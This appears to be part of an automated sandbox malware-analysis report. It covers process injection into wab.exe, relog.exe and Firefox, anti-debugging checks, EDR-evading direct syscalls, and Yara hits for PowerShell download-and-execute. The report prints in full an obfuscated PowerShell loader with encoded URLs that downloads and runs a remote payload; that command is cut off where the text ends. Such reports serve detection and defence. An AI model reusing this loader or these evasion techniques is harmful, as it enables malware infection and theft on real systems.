Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]	26_2_21C81460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]	26_2_21C81460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]	26_2_21C81460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]	26_2_21C9F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]	26_2_21C9F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]	26_2_21C9F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]	26_2_21C9F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]	26_2_21C9F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]	26_2_21C9F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D5547F mov eax, dword ptr fs:[00000030h]	26_2_21D5547F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0C460 mov ecx, dword ptr fs:[00000030h]	26_2_21D0C460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAA470 mov eax, dword ptr fs:[00000030h]	26_2_21CAA470
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAA470 mov eax, dword ptr fs:[00000030h]	26_2_21CAA470
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAA470 mov eax, dword ptr fs:[00000030h]	26_2_21CAA470
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D07410 mov eax, dword ptr fs:[00000030h]	26_2_21D07410
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA340D mov eax, dword ptr fs:[00000030h]	26_2_21CA340D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB8402 mov eax, dword ptr fs:[00000030h]	26_2_21CB8402
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB8402 mov eax, dword ptr fs:[00000030h]	26_2_21CB8402
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB8402 mov eax, dword ptr fs:[00000030h]	26_2_21CB8402
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7C427 mov eax, dword ptr fs:[00000030h]	26_2_21C7C427
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7E420 mov eax, dword ptr fs:[00000030h]	26_2_21C7E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7E420 mov eax, dword ptr fs:[00000030h]	26_2_21C7E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7E420 mov eax, dword ptr fs:[00000030h]	26_2_21C7E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C857C0 mov eax, dword ptr fs:[00000030h]	26_2_21C857C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C857C0 mov eax, dword ptr fs:[00000030h]	26_2_21C857C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C857C0 mov eax, dword ptr fs:[00000030h]	26_2_21C857C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D007C3 mov eax, dword ptr fs:[00000030h]	26_2_21D007C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C817EC mov eax, dword ptr fs:[00000030h]	26_2_21C817EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C817EC mov eax, dword ptr fs:[00000030h]	26_2_21C817EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C817EC mov eax, dword ptr fs:[00000030h]	26_2_21C817EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA27ED mov eax, dword ptr fs:[00000030h]	26_2_21CA27ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA27ED mov eax, dword ptr fs:[00000030h]	26_2_21CA27ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA27ED mov eax, dword ptr fs:[00000030h]	26_2_21CA27ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0E7E1 mov eax, dword ptr fs:[00000030h]	26_2_21D0E7E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C847FB mov eax, dword ptr fs:[00000030h]	26_2_21C847FB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C847FB mov eax, dword ptr fs:[00000030h]	26_2_21C847FB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3F78A mov eax, dword ptr fs:[00000030h]	26_2_21D3F78A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D537B6 mov eax, dword ptr fs:[00000030h]	26_2_21D537B6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C807AF mov eax, dword ptr fs:[00000030h]	26_2_21C807AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D097A9 mov eax, dword ptr fs:[00000030h]	26_2_21D097A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAD7B0 mov eax, dword ptr fs:[00000030h]	26_2_21CAD7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0F7AF mov eax, dword ptr fs:[00000030h]	26_2_21D0F7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0F7AF mov eax, dword ptr fs:[00000030h]	26_2_21D0F7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0F7AF mov eax, dword ptr fs:[00000030h]	26_2_21D0F7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0F7AF mov eax, dword ptr fs:[00000030h]	26_2_21D0F7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0F7AF mov eax, dword ptr fs:[00000030h]	26_2_21D0F7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D04755 mov eax, dword ptr fs:[00000030h]	26_2_21D04755
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB674D mov esi, dword ptr fs:[00000030h]	26_2_21CB674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB674D mov eax, dword ptr fs:[00000030h]	26_2_21CB674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB674D mov eax, dword ptr fs:[00000030h]	26_2_21CB674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C93740 mov eax, dword ptr fs:[00000030h]	26_2_21C93740
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C93740 mov eax, dword ptr fs:[00000030h]	26_2_21C93740
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C93740 mov eax, dword ptr fs:[00000030h]	26_2_21C93740
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0E75D mov eax, dword ptr fs:[00000030h]	26_2_21D0E75D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C80750 mov eax, dword ptr fs:[00000030h]	26_2_21C80750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D53749 mov eax, dword ptr fs:[00000030h]	26_2_21D53749
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2750 mov eax, dword ptr fs:[00000030h]	26_2_21CC2750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2750 mov eax, dword ptr fs:[00000030h]	26_2_21CC2750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B765 mov eax, dword ptr fs:[00000030h]	26_2_21C7B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B765 mov eax, dword ptr fs:[00000030h]	26_2_21C7B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B765 mov eax, dword ptr fs:[00000030h]	26_2_21C7B765

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_23D7724E GetProcessHeap,

10_2_23D7724E

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D72B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_23D72B1C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_23D72639
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_23D760E2

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7616.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_5288.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7860, type: MEMORYSTR

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtTerminateThread: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtTerminateProcess: Direct from: 0x76F02D5C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtCreateUserProcess: Direct from: 0x76F0371C

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Windows\SysWOW64\relog.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe protection: read write
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\relog.exe

Thread register set: target process: 3408

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\relog.exe

Thread APC queued: target process: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3FA0000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 73FD94	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3280000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 327FF8C

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs 